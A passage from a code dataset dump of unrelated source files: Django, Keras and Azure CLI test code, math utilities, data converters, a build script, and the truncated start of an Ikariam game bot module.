request.LANGUAGE_CODE\n new_obj = Gallery.objects.get(uid=uid,language_code=language)\n slug = self.kwargs.get(\"slug\")\n if slug != new_obj.slug:\n return HttpResponseRedirect(reverse(\"gallery:gallery_detail\",args=(new_obj.slug,)))\n else:\n context = self.get_context_data(object=self.object)\n return self.render_to_response(context)\n","sub_path":"ituro_website/gallery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"505541958","text":"import os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nfrom train import data_downloader\n\n\nclass ModelType:\n Xception = \"Xception\"\n MobileNetV2 = \"MobileNetV2\"\n VGG16 = \"VGG16\"\n NASNetMobile = \"NASNetMobile\"\n InceptionResNetV2 = \"InceptionResNetV2\"\n\n img_size_map = {\n Xception: 299,\n MobileNetV2: 224,\n VGG16: 224,\n NASNetMobile: 224,\n InceptionResNetV2: 299,\n }\n\n def __init__(self, model_str):\n self.model_str = model_str\n\n @property\n def img_size(self):\n return self.img_size_map[self.model_str]\n\n\ndef main(need_download=False):\n from model import keras_model\n from model import custom_model\n from model import model_info\n from plot import show_single_image\n from train import data_loader\n\n import matplotlib.pyplot as plt\n\n plt.interactive(False)\n\n # gpus = tf.config.experimental.list_physical_devices('GPU')\n # if gpus:\n # try:\n # tf.config.experimental.set_memory_growth(gpus[0], True)\n # except RuntimeError as e:\n # # 프로그램 시작시에 메모리 증가가 설정되어야만 합니다\n # print(e)\n\n data_type = data_loader.DataType(data_loader.DataType.People)\n\n # 다운 시작\n if need_download:\n session = data_downloader.get_session()\n # data 폴더에 train/validate 폴더를 나누고 label 이름의 폴더로 다운로드 진행\n data_type.download(session)\n\n # load data\n model_type = ModelType(ModelType.NASNetMobile)\n train_model = True\n base_model_only = False\n\n data_info = data_loader.DatasetInfo(\n img_size=model_type.img_size, data_type=data_type\n )\n dataset = data_loader.Dataset(data_info)\n\n model_info = model_info.ModelInfo(\n model_type.model_str,\n base_model_only=base_model_only,\n model_name=data_type.data_str,\n class_names=dataset.class_names,\n version=model_type.model_str + \"_1.0\",\n data_info=data_info,\n img_size=model_type.img_size,\n load_model=True,\n load_model_path=\"models/People/NASNetMobile_1.0/2020_02_22_12_32_07/model.022-1.02.hdf5\",\n )\n\n # model_info = model_info.ModelInfo(model_type.model_str, base_model_only=base_model_only,\n # model_name=data_type.data_str, class_names=dataset.class_names,\n # version=model_type.model_str + \"_1.0\", data_info=data_info,\n # img_size=model_type.img_size)\n\n model = custom_model.CNNWithDense(model_info)\n data_loader.confusing_data(model, data_info)\n\n if train_model:\n # CHECK which file is not trained\n untrained_dataset = data_loader.Dataset(data_info, from_untrained_file=True)\n\n last_layer_train_info = keras_model.TrainInfo(\n learning_rate=1e-5,\n momentum=0.9,\n update_base=False,\n warmup_batches=15,\n epochs=30,\n )\n model.train_model(untrained_dataset, last_layer_train_info)\n model.train_model(dataset, last_layer_train_info)\n\n all_layer_train_info = keras_model.TrainInfo(\n learning_rate=1e-6,\n momentum=0.9,\n update_base=True,\n warmup_batches=15,\n epochs=30,\n )\n model.train_model(dataset, all_layer_train_info)\n\n # sample train and test with it\n train, val = dataset.get_raw_data()\n for image in train:\n prob_list, label, version, class_names = model.predict(image[0])\n show_single_image(image, label)\n\n print(label)\n input(\"Next\")\n\n\nif __name__ == \"__main__\":\n main(need_download=True)\n","sub_path":"src/train_main.py","file_name":"train_main.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592251635","text":"import requests\nimport json\n\nclass Light:\n\tlight_id = '0'\n\ton = False\n\tbrightness = 0\n\thue = 0\n\tsaturation = 0\n\n\tdef __init__(self, light_id, state = None):\n\t\tself.light_id = light_id\n\t\tself.update(state)\n\n\tdef update(self, state = None):\n\t\tif(state == None): #Then we refresh\n\t\t\tstate = get_state(self.light_id)\n\t\telse:\n\t\t\tif 'on' in state.keys():\n\t\t\t\tself.on = state['on']\n\t\t\tif 'bri' in state.keys():\n\t\t\t\tself.brightness = state['bri']\n\t\t\tif 'hue' in state.keys():\n\t\t\t\tself.hue = state['hue']\n\t\t\tif 'sat' in state.keys():\n\t\t\t\tself.saturation = state['sat']\n\n\tdef to_dict(self):\n\t\treturn {'Light': self.light_id, 'is on': self.on, 'bri': self.brightness, 'hue': self.hue, 'sat': self.saturation }\n","sub_path":"Light.py","file_name":"Light.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"229639249","text":"'''\nCreated on Dec 8, 2014\nmp3 : http://mp3cut.net/\n@author: wangjoh\n'''\n\n'''\nCreated on Dec 7, 2014\n\n@author: wangjoh\n'''\nimport hashlib\n\nprint ('process 1st metadat')\nf1 = input('Enter first file : ')\n#f1 = sys.argv[2]\nt1tbl={}\ni1tbl={}\n\nchunks=0\nngramIndex=0\ntmp=''\ncount=0\n\nwith open(f1,'rb') as f:\n while True:\n line=f.readline()\n if not line: break\n arr=line.strip().split()\n if arr[0] == b'file':\n t1tbl.clear()\n elif arr[0] == b'chunk':\n chunks=chunks+1\n t1tbl[chunks]=arr[3]\n #length=length+int(arr[2])\n #tresult = ttbl.has_key(arr[3])\n #if tresult == False:\n\nfor i1 in t1tbl:\n print (i1,'-',t1tbl[i1])\n \nfor x1 in t1tbl:\n if (x1+3) <= chunks:\n tmp = t1tbl[x1].decode(\"utf-8\")+t1tbl[x1+1].decode(\"utf-8\")+t1tbl[x1+2].decode(\"utf-8\")+t1tbl[x1+3].decode(\"utf-8\")\n ngramIndex=ngramIndex+1 \n i1tbl[hashlib.sha1(tmp.encode(encoding='utf_8', errors='strict')).hexdigest()]=tmp\n\nfor y1 in sorted(i1tbl):\n count=count+1\n print (count, y1,'-',i1tbl[y1])\n\nprint ('process 2nd metadat')\nf2 = input('Enter second file : ')\n#f2 = sys.argv[4]\nt2tbl={}\ni2tbl={}\n\nchunks=0\nngramIndex=0\ntmp=''\ncount=0\n\nwith open(f2,'rb') as f:\n while True:\n line=f.readline()\n if not line: break\n arr=line.strip().split()\n if arr[0] == b'file':\n t2tbl.clear()\n elif arr[0] == b'chunk':\n chunks=chunks+1\n t2tbl[chunks]=arr[3]\n #length=length+int(arr[2])\n #tresult = ttbl.has_key(arr[3])\n #if tresult == False:\n\nfor i2 in t2tbl:\n print (i2,'-',t2tbl[i2])\n \nfor x2 in t2tbl:\n if (x2+3) <= chunks:\n tmp = t2tbl[x2].decode(\"utf-8\")+t2tbl[x2+1].decode(\"utf-8\")+t2tbl[x2+2].decode(\"utf-8\")+t2tbl[x2+3].decode(\"utf-8\")\n ngramIndex=ngramIndex+1 \n i2tbl[hashlib.sha1(tmp.encode(encoding='utf_8', errors='strict')).hexdigest()]=tmp\n #itbl[ngramIndex]=tmp\n\nfor y2 in sorted(i2tbl):\n count=count+1\n print (count, y2,'-',i2tbl[y2])\n\n#caculate Jaccard similarity rate\nuniontbl={}\nprint ('print union')\nunioncount=0\nuniontbl = dict(list(i1tbl.items()) + list(i2tbl.items()))\nfor j in uniontbl:\n print (j,'-',uniontbl[j])\n unioncount=unioncount+1\n\nintersecttbl={}\nprint ('print intersection')\nintersectcount=0\nintersecttbl = dict(i1tbl.items() & i2tbl.items())\nfor k in intersecttbl:\n print (k,'-',intersecttbl[k])\n intersectcount=intersectcount+1\n \nprint (round(intersectcount/unioncount,4)*100, '%') \n","sub_path":"prjPyMinHash/pkgPyMinHash/testcliMin-Wise.py","file_name":"testcliMin-Wise.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"207986280","text":"import logging\nlogging.basicConfig(filename=\"mylog.txt\",level=logging.INFO)\nlogging.info(\"A New request came:\")\ntry:\n x=int(input(\"Enter the first number: \"))\n y=int(input(\"Enter the second number: \"))\n print(x/y)\nexcept ZeroDivisionError as msg:\n print(\"Cannot divided with Zero\")\n logging.exception(msg)\nexcept ValueError as msg:\n print(\"Enter only int values\")\n logging.exception(msg)\nlogging.info(\"request processing completed\")","sub_path":"New Test.py","file_name":"New Test.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"404893690","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport tempfile\nimport unittest\n\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer, JMESPathCheck,\n JMESPathCheckExists)\n\n# flake8: noqa\n\nclass AzureKubernetesServiceScenarioTest(ScenarioTest):\n @ResourceGroupPreparer(random_name_length=17, name_prefix='clitest')\n def test_aks_create_default_service(self, resource_group, resource_group_location):\n # the simplest aks create scenario\n loc = resource_group_location\n # override loc to westus2\n loc = 'westus2'\n ssh_pubkey_file = self.generate_ssh_keys()\n aks_name = self.create_random_name('cliakstest', 16)\n dns_prefix = self.create_random_name('cliaksdns', 16)\n\n # create\n ssh_pubkey_file = ssh_pubkey_file.replace('\\\\', '\\\\\\\\')\n create_cmd = 'aks create -g {} -n {} --dns-name-prefix {} --ssh-key-value {} -l {}'\n self.cmd(create_cmd.format(resource_group, aks_name, dns_prefix, ssh_pubkey_file, loc), checks=[\n JMESPathCheckExists('properties.fqdn'),\n JMESPathCheck('properties.provisioningState', 'Succeeded')\n ])\n\n # show\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('type', 'Microsoft.ContainerService/ManagedClusters'),\n JMESPathCheck('name', aks_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('properties.agentPoolProfiles[0].count', 3),\n JMESPathCheck('properties.agentPoolProfiles[0].vmSize', 'Standard_D2_v2'),\n JMESPathCheck('properties.dnsPrefix', dns_prefix)\n ])\n\n # scale-up\n self.cmd('aks scale -g {} -n {} --node-count 5'.format(resource_group, aks_name), checks=[\n JMESPathCheck('properties.agentPoolProfiles[0].count', 5)\n ])\n\n # show again\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('properties.agentPoolProfiles[0].count', 5)\n ])\n\n @ResourceGroupPreparer(random_name_length=17, name_prefix='clitest')\n def test_aks_create_with_upgrade(self, resource_group, resource_group_location):\n loc = resource_group_location\n # override loc to westus2\n loc = 'westus2'\n ssh_pubkey_file = self.generate_ssh_keys()\n aks_name = self.create_random_name('cliakstest', 16)\n dns_prefix = self.create_random_name('cliaksdns', 16)\n original_k8s_version = '1.7.7'\n\n # create\n ssh_pubkey_file = ssh_pubkey_file.replace('\\\\', '\\\\\\\\')\n create_cmd = 'aks create -g {} -n {} --dns-name-prefix {} --ssh-key-value {} --kubernetes-version {} -l {}'\n self.cmd(create_cmd.format(resource_group, aks_name, dns_prefix, ssh_pubkey_file, original_k8s_version, loc),\n checks=[\n JMESPathCheckExists('properties.fqdn'),\n JMESPathCheck('properties.provisioningState', 'Succeeded')])\n\n # show\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('type', 'Microsoft.ContainerService/ManagedClusters'),\n JMESPathCheck('name', aks_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('properties.agentPoolProfiles[0].count', 3),\n JMESPathCheck('properties.agentPoolProfiles[0].vmSize', 'Standard_D2_v2'),\n JMESPathCheck('properties.dnsPrefix', dns_prefix),\n JMESPathCheck('properties.provisioningState', 'Succeeded'),\n JMESPathCheck('properties.kubernetesVersion', '1.7.7')\n ])\n\n # upgrade\n new_k8s_version = '1.8.1'\n upgrade_cmd = 'aks upgrade -g {} -n {} --kubernetes-version {} --yes'\n self.cmd(upgrade_cmd.format(resource_group, aks_name, new_k8s_version), checks=[\n JMESPathCheck('properties.provisioningState', 'Succeeded')\n ])\n\n # show again\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('properties.kubernetesVersion', '1.8.1')\n ])\n\n @classmethod\n def generate_ssh_keys(cls):\n TEST_SSH_KEY_PUB = \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCbIg1guRHbI0lV11wWDt1r2cUdcNd27CJsg+SfgC7miZeubtwUhbsPdhMQsfDyhOWHq1+ZL0M+nJZV63d/1dhmhtgyOqejUwrPlzKhydsbrsdUor+JmNJDdW01v7BXHyuymT8G4s09jCasNOwiufbP/qp72ruu0bIA1nySsvlf9pCQAuFkAnVnf/rFhUlOkhtRpwcq8SUNY2zRHR/EKb/4NWY1JzR4sa3q2fWIJdrrX0DvLoa5g9bIEd4Df79ba7v+yiUBOS0zT2ll+z4g9izHK3EO5d8hL4jYxcjKs+wcslSYRWrascfscLgMlMGh0CdKeNTDjHpGPncaf3Z+FwwwjWeuiNBxv7bJo13/8B/098KlVDl4GZqsoBCEjPyJfV6hO0y/LkRGkk7oHWKgeWAfKtfLItRp00eZ4fcJNK9kCaSMmEugoZWcI7NGbZXzqFWqbpRI7NcDP9+WIQ+i9U5vqWsqd/zng4kbuAJ6UuKqIzB0upYrLShfQE3SAck8oaLhJqqq56VfDuASNpJKidV+zq27HfSBmbXnkR/5AK337dc3MXKJypoK/QPMLKUAP5XLPbs+NddJQV7EZXd29DLgp+fRIg3edpKdO7ZErWhv7d+3Kws+e1Y+ypmR2WIVSwVyBEUfgv2C8Ts9gnTF4pNcEY/S2aBicz5Ew2+jdyGNQQ== test@example.com\\n\" # pylint: disable=line-too-long\n _, pathname = tempfile.mkstemp()\n with open(pathname, 'w') as key_file:\n key_file.write(TEST_SSH_KEY_PUB)\n return pathname\n","sub_path":"src/command_modules/azure-cli-acs/azure/cli/command_modules/acs/tests/test_aks_commands.py","file_name":"test_aks_commands.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"430337484","text":"import socket\n\n\nadd = ('127.0.0.1',8000)\nsock = socket.socket()\nsock.bind(add)\nsock.listen()\n\ntry:\n conn, radd = sock.accept()\n data = conn.recv(1024)\n print(data)\n ret_http ='HTTP/1.1 200 OK\\n Content-Type:text/html\\n Content-length:'\n with open(r'D:\\magedu_python\\img.jpg','rb') as f:\n info = f.read()\n length = len(info)\n ret_http = ret_http.encode()+ str(length).encode() + b'\\n\\n'+ info\n send = conn.sendall(ret_http)\n conn.send(info)\n conn.close()\n sock.close()\nexcept Exception as e:print(e)\nfinally:\n sock.close()","sub_path":"blog_be/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"225661802","text":"# Tools for multiplying real spherical harmonics\n\n# Based on:\n# Herbert H.H. Homeier, E.Otto Steinborn,\n# Some properties of the coupling coefficients of real spherical harmonics\n# and their relation to Gaunt coefficients,\n# Journal of Molecular Structure\n# Volume 368, 1996, Pages 31-37, ISSN 0166-1280,\n# https://doi.org/10.1016/S0166-1280(96)90531-X.\n\nfrom polaris import util as myutil\nimport numpy as np\nfrom sympy import *\nfrom sympy.physics.wigner import gaunt, wigner_3j, clebsch_gordan\nkd = KroneckerDelta\n\n# Heaviside function\ndef hv(x):\n if x > 0:\n return 1\n else:\n return 0\n\n# Unitary matrix that transforms complex sh to real sh\n# See Eq. 12.\ndef U(l, m, mu):\n t1 = kd(m, 0)*kd(mu, 0)\n t2 = hv(mu)*kd(m, mu)\n t3 = hv(-mu)*I*((-1)**np.abs(m))*kd(m, mu)\n t4 = hv(-mu)*(-I)*kd(m, -mu)\n t5 = hv(mu)*((-1)**np.abs(m))*kd(m, -mu)\n return t1 + ((t2 + t3 + t4 + t5)/sqrt(2))\n\n# Real gaunt coefficients\n# See Eqs. 26. The sympy gaunt function does not use a complex conjugate.\n# This sum could be truncated using selection rules, but this is fairly quick.\ndef Rgaunt(l1, l2, l3, m1, m2, m3, evaluate=True):\n result = 0\n for m1p in range(-l1, l1+1):\n U1 = U(l1, m1p, m1)\n for m2p in range(-l2, l2+1):\n U2 = U(l2, m2p, m2)\n for m3p in range(-l3, l3+1):\n U3 = U(l3, m3p, m3)\n result += U1*U2*U3*gaunt(l1, l2, l3, m1p, m2p, m3p)\n if evaluate:\n return result.evalf()\n else:\n return result\n\n# Compute and save an array with all of the gaunt coefficients up to specified\n# band\ndef calc_gaunt_tensor(filename, lmax=4):\n jmax = myutil.maxl2maxj(lmax)\n G = np.zeros((jmax, jmax, jmax))\n for index, g in np.ndenumerate(G):\n print(index)\n l1, m1 = myutil.j2lm(index[0])\n l2, m2 = myutil.j2lm(index[1])\n l3, m3 = myutil.j2lm(index[2])\n G[index] = Rgaunt(l1, l2, l3, m1, m2, m3)\n np.save(filename, G)\n return G\n\n# Compute and save an array with all of the circular harmonic triple integrals\n# up to specified band\ndef calc_chtriple_tensor(filename, nmax=2):\n def ch(n):\n if n == 0:\n return 1/sqrt(2*pi)\n if n > 0:\n return cos(n*x)/sqrt(pi)\n if n < 0:\n return sin(n*x)/sqrt(pi)\n \n nlen = 2*nmax + 1\n P = np.zeros((nlen, nlen, nlen))\n x = Symbol('x')\n for index, p in np.ndenumerate(P):\n n1 = myutil.i2n(index[0])\n n2 = myutil.i2n(index[1])\n n3 = myutil.i2n(index[2])\n P[index] = integrate(ch(n1)*ch(n2)*ch(n3), (x, 0, 2*pi))\n print(index, P[index])\n print(P)\n np.save(filename, P)\n return 1\n\n# Multiply two vectors of even band real spherical harmonic coefficients.\n# Vectors must have the same length and be ordered like\n#\n# y_0^0, y_2^-2, y_2^-1, y_2^0, y_2^1...\n#\n# Example:\n#\n# multiply_sh_coefficients([2, 1, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0])\n#\n# gives the coefficients of (2y_0^0 + y_2^-2) x y_2^-2.\n#\n# Slow compared to precomputing the \"gaunt tensor\"---see shcoeffs.py\ndef multiply_sh_coefficients(a, b, evaluate=True):\n maxl, m = myutil.j2lm(len(a) - 1)\n c = [0]*(myutil.maxl2maxj(maxl + 2))\n for i, ai in enumerate(a):\n l1, m1 = myutil.j2lm(i)\n for j, bi in enumerate(b):\n l2, m2 = myutil.j2lm(j)\n for k, ci in enumerate(c):\n l3, m3 = myutil.j2lm(k)\n if ai != 0 and bi != 0:\n c[k] += ai*bi*Rgaunt(l1, l2, l3, m1, m2, m3, evaluate=evaluate)\n return c\n","sub_path":"polaris/harmonics/gaunt.py","file_name":"gaunt.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"633480441","text":"import os\nimport re\nimport logging\nfrom flask import Flask\n\n\n\nclass Boot:\n \n @classmethod\n def start(cls):\n cls.__initialize_logger()\n cls.__initialize_script()\n cls.__initialize_routes()\n \n @classmethod\n def __initialize_logger(cls):\n if not Flask.app.config['DEBUG']: return True\n fh = logging.FileHandler(\"log/%s.log\" % (Flask.env))\n formater = logging.Formatter(\"[%(asctime)s] %(levelname)-5s : %(message)s\")\n fh.setFormatter(formater)\n \n if 'DEBUG_LEVEL' in Flask.app.config:\n debug_level = Flask.app.config['DEBUG_LEVEL']\n fh.setLevel(Flask.app.config['DEBUG_LEVEL'])\n \n Flask.app.logger.addHandler(fh)\n \n @classmethod\n def __initialize_script(cls):\n files = os.listdir('config/initializers')\n \n for f in files:\n if re.search(r\".py$\", f):\n __import__('config.initializers.%s' % (f[0:-3]))\n pass\n \n @classmethod\n def __initialize_routes(cls):\n import config.routes\n \n \n \n \n \n \n \n \n ","sub_path":"config/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"146964073","text":"from pvalue import Pvalue\nimport argparse\nimport pandas as pd\nimport itertools\nclass NetworkGen:\n def __init__(self,arg1, arg2, arg3):\n self.drugs = arg1\n self.targets = arg2\n self.protein_nodes = arg3\n self.pvalue = Pvalue(500 ,214,self.drugs,self.targets,\"\",\"\")\n self.init()\n \n def init(self):\n df_nodes = pd.read_csv(self.protein_nodes)\n proteins = []\n for row in df_nodes.iterrows():\n #print(type(row),len(row))\n #print(row[0],row[1].to_dict())\n u_acc = row[1].to_dict()['uniprot_accession']\n u_id = row[1].to_dict()['uniprot_id']\n ind = row[1].to_dict()['indications']\n #print(u_acc, u_id, ind)\n proteins.append(u_acc)\n\n #print(len(proteins)) \n pairs = list(itertools.combinations(proteins,2))\n #print(len(pairs))\n #x = pairs[0]\n #pb = self.pvalue.pb(x[0],x[1])\n #print(pb)\n check={}\n fh = open(\"network_edgelist.txt\",\"w\")\n for x in pairs:\n pb = self.pvalue.pb(x[0],x[1])\n if (x[0],x[1]) in check:\n print('DUPLICATE')\n check[(x[0],x[1])] = 1\n check[(x[1],x[0])] = 1\n #print(\"pb:\",pb)\n if pb<=0.05:\n fh.write(x[0]+\" \"+x[1]+\"\\n\")\n fh.close()\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('arg1', type=str, help='drugs.csv location')\n parser.add_argument('arg2', type=str, help='targets.csv location')\n parser.add_argument('arg3', type=str, help='protein_nodes location')\n \n args = parser.parse_args()\n #print(args.arg1,args.arg2,args.arg3)\n ngen = NetworkGen(args.arg1,args.arg2,args.arg3)\n \n\n","sub_path":"networkgen.py","file_name":"networkgen.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"76400929","text":"#!/usr/bin/python\r\n# Author : Michel Benites Nascimento\r\n# Date : 02/24/2018\r\n# Descr. : Converting normal logs to avro format\r\n\r\nimport sys\r\nimport avro.schema\r\nfrom avro.datafile import DataFileWriter\r\nfrom avro.io import DatumWriter\r\nimport uuid\r\n\r\n# Main function\r\ndef main ():\r\n\r\n # Define schema of avro file.\r\n schema = avro.schema.Parse(open(\"logs_uuid.avsc\", \"rb\").read())\r\n\r\n # Create a datum writer.\r\n rwriter = DatumWriter(schema)\r\n\r\n files = ['logs_0.txt', 'logs_1.txt', 'logs_2.txt', 'logs_3.txt']\r\n \r\n # Loop to process the files \r\n for f in files:\r\n\r\n # open file and store in a variable\r\n logfile = open(f, \"r\")\r\n text = logfile.readlines()\r\n logfile.close()\r\n\r\n # Set the avro file name (new)\r\n newfile = str(f).replace('.txt','uuid.avro')\r\n\r\n # Create a data file writer.\r\n dfwriter = DataFileWriter (open(newfile, \"wb\"), DatumWriter(), schema)\r\n\r\n # Loop to get information from each line\r\n for line in text:\r\n\r\n # Get the variables from line.\r\n sdt, surl, suser = line.strip().split('\\t')\r\n\r\n # Defines a dictionary structure\r\n data = {}\r\n data['timestamp'] = sdt\r\n data['url'] = surl\r\n data['user'] = suser\r\n data['uuid'] = str(uuid.uuid1())\r\n\r\n # Write the data in the file.\r\n dfwriter.append (data)\r\n\r\n # Close the file after the loop.\r\n dfwriter.close()\r\n\r\n\r\n# Calling main function\r\nif __name__ == '__main__': \r\n sys.exit(main())\r\n","sub_path":"P05.01.LogtoAvroUUID.py","file_name":"P05.01.LogtoAvroUUID.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"62667720","text":"# -*- coding: utf-8 -*-\n\"\"\"Script to fix frozen dependencies.\n\nBecause Pype code needs to run under different versions of Python interpreter\n(yes, even Python 2) we need to include all dependencies as source code\nwithout Python's system stuff. Cx-freeze puts everything into lib and compile\nit as .pyc/.pyo files and that doesn't work for hosts like Maya 2020 with\ntheir own Python interpreter and libraries.\n\nThis script will take ``site-packages`` and copy them to built Pype under\n``dependencies`` directory. It will then compare stuff inside with ``lib``\nfolder in frozen Pype, removing duplicities from there.\n\nThis must be executed after build finished and it is done by build PowerShell\nscript.\n\nNote: Speedcopy can be used for copying if server-side copy is important for\nspeed.\n\n\"\"\"\nimport os\nimport sys\nimport site\nfrom distutils.util import get_platform\nfrom pathlib import Path\nimport shutil\nimport blessed\nimport time\n\n\nterm = blessed.Terminal()\n\n\ndef _print(msg: str, type: int = 0) -> None:\n \"\"\"Print message to console.\n\n Args:\n msg (str): message to print\n type (int): type of message (0 info, 1 error, 2 note)\n\n \"\"\"\n if type == 0:\n header = term.aquamarine3(\">>> \")\n elif type == 1:\n header = term.orangered2(\"!!! \")\n elif type == 2:\n header = term.tan1(\"... \")\n else:\n header = term.darkolivegreen3(\"--- \")\n\n print(\"{}{}\".format(header, msg))\n\n\n_print(\"Starting dependency cleanup ...\")\nstart_time = time.time_ns()\n\n# path to venv site packages\nsites = site.getsitepackages()\n\n# WARNING: this assumes that all we've got is path to venv itself and\n# another path ending with 'site-packages' as is default. But because\n# this must run under different platform, we cannot easily check if this path\n# is the one, because under Linux and macOS site-packages are in different\n# location.\nsite_pkg = None\nfor s in sites:\n site_pkg = Path(s)\n if site_pkg.name == \"site-packages\":\n break\n\n_print(\"Getting venv site-packages ...\")\nassert site_pkg, \"No venv site-packages are found.\"\n_print(f\"Working with: {site_pkg}\", 2)\n\n\nbuild_dir = \"exe.{}-{}\".format(get_platform(), sys.version[0:3])\n\n# create full path\nbuild_dir = Path(os.path.dirname(__file__)).parent / \"build\" / build_dir\n\n_print(f\"Using build at {build_dir}\", 2)\nif not build_dir.exists():\n _print(\"Build directory doesn't exist\", 1)\n _print(\"Probably freezing of code failed. Check ./build/build.log\", 3)\n sys.exit(1)\n\ndeps_dir = build_dir / \"dependencies\"\n\n# copy all files\n_print(\"Copying dependencies ...\")\nshutil.copytree(site_pkg.as_posix(), deps_dir.as_posix())\n\n# iterate over frozen libs and create list to delete\nlibs_dir = build_dir / \"lib\"\n\nto_delete = []\n_print(\"Finding duplicates ...\")\ndeps_items = list(deps_dir.iterdir())\nfor d in libs_dir.iterdir():\n if (deps_dir / d.name) in deps_items:\n to_delete.append(d)\n _print(f\"found {d}\", 3)\n\n# add openpype and igniter in libs too\nto_delete.append(libs_dir / \"openpype\")\nto_delete.append(libs_dir / \"igniter\")\n\n# delete duplicates\n_print(f\"Deleting {len(to_delete)} duplicates ...\")\nfor d in to_delete:\n if d.is_dir():\n shutil.rmtree(d)\n else:\n d.unlink()\n\nend_time = time.time_ns()\ntotal_time = (end_time - start_time) / 1000000000\n_print(f\"Dependency cleanup done in {total_time} secs.\")\n","sub_path":"tools/build_dependencies.py","file_name":"build_dependencies.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563647870","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport traceback\nfrom ikabot.helpers.botComm import *\nfrom ikabot.helpers.pedirInfo import *\nfrom ikabot.helpers.signals import setInfoSignal\nfrom ikabot.helpers.getJson import getCiudad\nfrom ikabot.helpers.planearViajes import planearViajes\nfrom ikabot.helpers.recursos import getRecursosDisponibles\nfrom ikabot.helpers.varios import addPuntos\nfrom ikabot.helpers.process import forkear\nfrom ikabot.helpers.gui import banner\n\ndef enviarVino(s):\n\tbanner()\n\tvinoTotal = 0\n\tdict_idVino_diponible = {}\n\t(idsCiudades, ciudades) = getIdsDeCiudades(s)\n\tciudadesVino = {}\n\tfor idCiudad in idsCiudades:\n\t\tesVino = ciudades[idCiudad]['tradegood'] == '1'\n\t\tif esVino:\n\t\t\thtml = s.get(urlCiudad + idCiudad)\n\t\t\tciudad = getCiudad(html)\n\t\t\trecursos = getRecursosDisponibles(html)\n\t\t\tdisponible = int(recursos[1]) - 1000 # dejo 1000 por las dudas\n\t\t\tciudad['disponible'] = disponible if disponible > 0 else 0\n\t\t\tvinoTotal += ciudad['disponible']\n\t\t\tciudadesVino[idCiudad] = ciudad\n\taEnviar = len(ciudades) - len(ciudadesVino)\n\tvinoXciudad = int(vinoTotal / aEnviar)\n\tmaximo = addPuntos(vinoXciudad)\n\n\tif vinoXciudad > 100000:\n\t\tmaximo = maximo[:-6] + '00.000'\n\telif vinoXciudad > 10000:\n\t\tmaximo = maximo[:-5] + '0.000'\n\telif vinoXciudad > 1000:\n\t\tmaximo = maximo[:-3] + '000'\n\telif vinoXciudad > 100:\n\t\tmaximo = maximo[:-2] + '00'\n\telif vinoXciudad > 10:\n\t\tmaximo = maximo[:-1] + '0'\n\tprint('Se puede enviar como máximo {} a cada ciudad'.format(maximo))\n\tcantidad = read(msg='¿Cuanto vino enviar a cada ciudad?:', min=0, max=vinoXciudad)\n\n\tprint('\\nPor enviar {} de vino a cada ciudad'.format(addPuntos(cantidad)))\n\tprint('¿Proceder? [Y/n]')\n\trta = read(values=['y', 'Y', 'n', 'N', ''])\n\tif rta.lower() == 'n':\n\t\treturn\n\n\tforkear(s)\n\tif s.padre is True:\n\t\treturn\n\n\trutas = []\n\tfor idCiudadDestino in idsCiudades:\n\t\tif idCiudadDestino not in ciudadesVino:\n\t\t\thtmlD = s.get(urlCiudad + idCiudadDestino)\n\t\t\tciudadD = getCiudad(htmlD)\n\t\t\tidIsla = ciudadD['islandId']\n\t\t\tfaltante = cantidad\n\t\t\tfor idCiudadOrigen in ciudadesVino:\n\t\t\t\tif faltante == 0:\n\t\t\t\t\tbreak\n\t\t\t\tciudadO = ciudadesVino[idCiudadOrigen]\n\t\t\t\tvinoDisponible = ciudadO['disponible']\n\t\t\t\tfor ruta in rutas:\n\t\t\t\t\t(origen, _, _, _, vn, _, _, _) = ruta\n\t\t\t\t\tif origen['id'] == idCiudadOrigen:\n\t\t\t\t\t\tvinoDisponible -= 